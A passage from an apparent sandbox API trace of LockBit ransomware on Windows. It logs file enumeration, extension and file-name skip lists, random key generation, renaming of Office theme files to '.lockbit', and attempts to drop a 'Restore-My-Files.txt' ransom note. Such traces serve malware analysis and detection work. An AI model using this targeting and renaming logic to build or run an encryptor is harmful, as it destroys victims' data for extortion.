lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.742] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.742] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.742] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.742] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.742] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.742] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.742] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.742] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.742] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.742] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.742] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.742] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.742] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.742] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.742] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.742] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.742] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.747] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.747] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.747] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.747] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.747] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.747] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.747] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.747] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.747] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Oriel.xml.lockbit") returned 84 [0193.747] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Oriel.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\oriel.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0193.749] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.749] malloc (_Size=0x40068) returned 0x1ff1e60 [0193.749] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=960) returned 1 [0193.749] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.750] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.750] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0193.750] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.750] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.750] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0193.750] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.757] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Oriel.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Oriel.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.757] malloc (_Size=0xbe) returned 0x1fa2ed8 [0193.757] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xbe, FileInformationClass=0xa) returned 0x0 [0193.759] free (_Block=0x1fa2ed8) [0193.759] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Oriel.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.759] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.759] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.759] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8885600, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x51c9cf70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf8885600, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0x3c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Origin.xml", cAlternateFileName="")) returned 1 [0193.759] lstrcmpiW (lpString1=".", lpString2="Origin.xml") returned -1 [0193.759] lstrcmpiW (lpString1="..", lpString2="Origin.xml") returned -1 [0193.759] PathFindExtensionW (pszPath="Origin.xml") returned=".xml" [0193.759] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.759] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.759] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.759] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.759] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.759] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.760] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.760] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.760] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.760] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.760] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.760] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.760] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.760] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.760] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.760] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.760] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.760] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.760] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.760] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.760] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.760] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.760] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.760] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.760] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.760] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.760] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.760] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.760] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.760] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.760] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.761] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.761] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.761] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.761] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.761] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.761] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.761] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.761] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.761] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.761] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.761] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.761] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.761] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.761] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.761] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.761] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.761] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Origin.xml") returned 1 [0193.761] lstrcmpiW (lpString1="ntldr", lpString2="Origin.xml") returned -1 [0193.761] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Origin.xml") returned -1 [0193.761] lstrcmpiW (lpString1="bootsect.bak", lpString2="Origin.xml") returned -1 [0193.761] lstrcmpiW (lpString1="autorun.inf", lpString2="Origin.xml") returned -1 [0193.761] lstrcmpiW (lpString1="thumbs.db", lpString2="Origin.xml") returned 1 [0193.761] lstrcmpiW (lpString1="iconcache.db", lpString2="Origin.xml") returned -1 [0193.761] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.762] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Origin.xml") returned=".xml" [0193.762] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.762] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.762] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.762] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.762] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.762] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.762] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.762] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.762] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.762] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.762] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.762] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.762] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.762] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.762] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.762] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.762] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.762] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.762] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.762] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.762] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.762] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.762] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.762] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.762] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.763] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.763] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.763] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.763] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Origin.xml.lockbit") returned 85 [0193.763] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Origin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\origin.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0193.769] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.769] malloc (_Size=0x40068) returned 0x3df0008 [0193.769] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=961) returned 1 [0193.769] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.770] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0193.770] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.770] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0193.770] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0193.772] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Origin.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Origin.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.772] malloc (_Size=0xc0) returned 0x1fa2ed8 [0193.772] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0193.773] free (_Block=0x1fa2ed8) [0193.773] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Origin.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.773] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.773] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.773] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9b98300, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x51c9cf70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf9b98300, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0x3c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Paper.xml", cAlternateFileName="")) returned 1 [0193.773] lstrcmpiW (lpString1=".", lpString2="Paper.xml") returned -1 [0193.774] lstrcmpiW (lpString1="..", lpString2="Paper.xml") returned -1 [0193.774] PathFindExtensionW (pszPath="Paper.xml") returned=".xml" [0193.774] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.774] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.774] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.774] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.774] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.774] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.774] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.774] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.774] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.774] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.774] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.774] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.774] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.774] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.774] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.774] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.774] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.774] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.774] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.774] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.774] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.774] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.774] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.775] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.775] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.775] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.775] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.775] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.775] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.775] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.775] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.775] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.775] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.775] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.775] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.775] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.775] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.775] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.775] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.775] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.775] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.775] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.775] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.775] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.775] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.775] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.775] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.775] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Paper.xml") returned 1 [0193.776] lstrcmpiW (lpString1="ntldr", lpString2="Paper.xml") returned -1 [0193.776] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Paper.xml") returned -1 [0193.776] lstrcmpiW (lpString1="bootsect.bak", lpString2="Paper.xml") returned -1 [0193.776] lstrcmpiW (lpString1="autorun.inf", lpString2="Paper.xml") returned -1 [0193.776] lstrcmpiW (lpString1="thumbs.db", lpString2="Paper.xml") returned 1 [0193.776] lstrcmpiW (lpString1="iconcache.db", lpString2="Paper.xml") returned -1 [0193.776] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.776] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Paper.xml") returned=".xml" [0193.776] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.776] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.776] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.776] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.776] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.776] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.776] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.776] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.776] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.776] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.776] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.776] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.776] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.776] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.776] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.776] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.776] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.776] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.777] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.777] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.777] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.777] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.777] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.777] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.777] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.777] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.777] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.777] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.777] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Paper.xml.lockbit") returned 84 [0193.777] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Paper.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\paper.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0193.778] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.778] malloc (_Size=0x40068) returned 0x1ff1e60 [0193.778] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=960) returned 1 [0193.778] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.779] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0193.779] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.779] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0193.779] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0193.786] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Paper.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Paper.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.786] malloc (_Size=0xbe) returned 0x1fa2ed8 [0193.786] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xbe, FileInformationClass=0xa) returned 0x0 [0193.787] free (_Block=0x1fa2ed8) [0193.787] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Paper.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.787] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.787] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.787] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8079f00, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x51cc30d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8079f00, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0x3c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Perspective.xml", cAlternateFileName="PERSPE~1.XML")) returned 1 [0193.787] lstrcmpiW (lpString1=".", lpString2="Perspective.xml") returned -1 [0193.787] lstrcmpiW (lpString1="..", lpString2="Perspective.xml") returned -1 [0193.787] PathFindExtensionW (pszPath="Perspective.xml") returned=".xml" [0193.787] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.787] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.787] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.787] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.787] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.787] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.788] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.788] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.788] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.788] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.788] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.788] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.788] lstrcmpiW (lpString1=".lock", 